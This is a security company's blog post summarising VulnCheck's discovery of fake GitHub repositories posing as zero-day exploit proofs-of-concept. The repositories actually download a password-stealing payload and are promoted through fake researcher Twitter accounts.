Project Hyphae

GitHub for Zero-Day Malware Distribution

Share This Post

Threat actors posing as Security Professionals have been using GitHub to distribute malware to unsuspecting victims. Security Firm VulnCheck has identified GitHub repositories that appear to contain Proof-Of-Concept for zero-day exploits for popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange, they instead download a Python script named which is simply a downloader for Linux and Windows systems. The script downloads a ZIP file from the internet based on the OS installed, then extracts the ZIP, and executes the payload. The Windows payload has a high detection rate (36/61) on VirusTotal as a password stealing trojan, while the Linux payload was only flagged by three scanners (now flagged by 24/61). Both the Linux and Windows ZIP files contain a TOR Client as part of their install.

The threat actors, in an attempt to gain traffic to their GitHub repositories, have created Twitter accounts for fake employees of fictitious Cyber Security Firm High Sierra Cyber Security. These accounts appear legitimate with security news posts, followers, and even stolen headshots from real security researchers at well known security firms. They then post about the new zero-day they have discovered and direct the reader to download the proof-of-concept from GitHub.

While the efficiency of using Twitter and GitHub to persuade victims to download malware isn’t clear yet, there are indicators that the threat actors are having some success. When VulnCheck reported to GitHub the malicious nature of the repositories and got them taken down, the threat actors quickly set up new repositories and began directing their Twitter readers to the new repositories.

VulnCheck’s blog post of their findings:

Bleeping Computer article about VulnCheck’s findings:

VirusTotal report for Windows payload:

VirusTotal report for Linux payload:

Reach out to our incident response team for help

More To Explore

CVE-2024-3596 | Attackers Blasting RADIUS

CVE-2024-3596 | CVSS:9.0 A new and emerging attacked named “Blast-RADIUS”, allows a man-in-the-middle attack between the RADIUS client and server to forge a valid protocol

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.